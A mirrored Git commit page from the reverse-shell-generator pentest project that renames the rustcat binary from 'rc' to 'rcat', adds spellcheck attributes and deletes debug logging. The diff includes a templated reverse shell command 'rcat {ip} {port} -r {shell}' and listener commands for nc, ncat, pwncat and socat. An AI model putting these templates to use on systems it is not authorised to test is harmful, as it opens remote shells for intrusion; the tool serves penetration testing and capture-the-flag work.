mirror of
https://github.com/0dayCTF/reverse-shell-generator.git
synced 2024-12-18 19:06:09 +00:00
Rc -> Rcat & Fixes
This commit is contained in:
parent
fd4002b841
commit
8efd307ac7
@ -148,7 +148,7 @@
|
||||
<div class="row justify-content-center">
|
||||
<div class="col-auto position-relative" style="min-width: 15vw">
|
||||
<pre class="prompt-sign">🚀</pre>
|
||||
<pre id="listener-command" class="bg-dark border text-wrap text-break p-4 pl-5 mb-2"
|
||||
<pre id="listener-command" class="bg-dark border text-wrap text-break p-4 pl-5 mb-2" spellcheck="false"
|
||||
style="outline: none; font-size:1em;" contenteditable="true"></pre>
|
||||
</div>
|
||||
</div>
|
||||
@ -247,7 +247,7 @@
|
||||
<div class="col position-relative">
|
||||
<pre class="prompt-sign">🚀</pre>
|
||||
<pre id="reverse-shell-command"
|
||||
class="bg-dark border pre-wrap text-break p-4 pl-5"
|
||||
class="bg-dark border pre-wrap text-break p-4 pl-5" spellcheck="false"
|
||||
style="outline: none; font-size:1em;" contenteditable="true"></pre>
|
||||
</div>
|
||||
</div>
|
||||
@ -351,7 +351,7 @@
|
||||
<div class="row flex-grow-1">
|
||||
<div class="col position-relative">
|
||||
<pre class="prompt-sign">🚀</pre>
|
||||
<pre id="bind-shell-command" class="bg-dark border pre-wrap text-break p-4 pl-5"
|
||||
<pre id="bind-shell-command" class="bg-dark border pre-wrap text-break p-4 pl-5" spellcheck="false"
|
||||
style="outline: none; font-size:1em;" contenteditable="true"></pre>
|
||||
</div>
|
||||
</div>
|
||||
@ -407,7 +407,7 @@
|
||||
<div class="col position-relative">
|
||||
<pre class="prompt-sign">🚀</pre>
|
||||
<pre id="msfvenom-command"
|
||||
class="bg-dark border pre-wrap text-break p-4 pl-5"
|
||||
class="bg-dark border pre-wrap text-break p-4 pl-5" spellcheck="false"
|
||||
style="outline: none; font-size:1em;" contenteditable="true"></pre>
|
||||
</div>
|
||||
</div>
|
||||
|
@ -81,7 +81,7 @@ const reverseShellCommands = withCommandType(
|
||||
},
|
||||
{
|
||||
"name": "rustcat",
|
||||
"command": "rc {ip} {port} -r {shell}",
|
||||
"command": "rcat {ip} {port} -r {shell}",
|
||||
"meta": ["linux", "mac"]
|
||||
},
|
||||
{
|
||||
@ -420,8 +420,8 @@ const rsgData = {
|
||||
['ncat', 'ncat -lvnp {port}'],
|
||||
['ncat (TLS)', 'ncat --ssl -lvnp {port}'],
|
||||
['rlwrap + nc', 'rlwrap -cAr nc -lvnp {port}'],
|
||||
['rc', 'rc -lp {port}'],
|
||||
['rc + Command History', 'rc -lHp {port}'],
|
||||
['rustcat', 'rcat -lp {port}'],
|
||||
['rustcat + Command History', 'rcat -lHp {port}'],
|
||||
['pwncat', 'python3 -m pwncat -lp {port}'],
|
||||
['windows ConPty', 'stty raw -echo; (stty size; cat) | nc -lvnp {port}'],
|
||||
['socat', 'socat -d -d TCP-LISTEN:{port} STDOUT'],
|
||||
|
@ -25,7 +25,6 @@ function initTheme() {
|
||||
if (currentTheme == null) {
|
||||
document.body.removeAttribute("data-theme")
|
||||
} else {
|
||||
console.log("there")
|
||||
document.body.setAttribute("data-theme", currentTheme)
|
||||
$("#theme-selector").val(currentTheme).change();
|
||||
}
|
||||
@ -38,7 +37,6 @@ function initTheme() {
|
||||
* @return {void}
|
||||
*/
|
||||
function resetTheme(currentTheme) {
|
||||
console.log(currentTheme)
|
||||
if (currentTheme !== "dark") {
|
||||
document.body.setAttribute("data-theme", currentTheme);
|
||||
localStorage.setItem("currentTheme", currentTheme);
|
||||
|
Loading…
Reference in New Issue
Block a user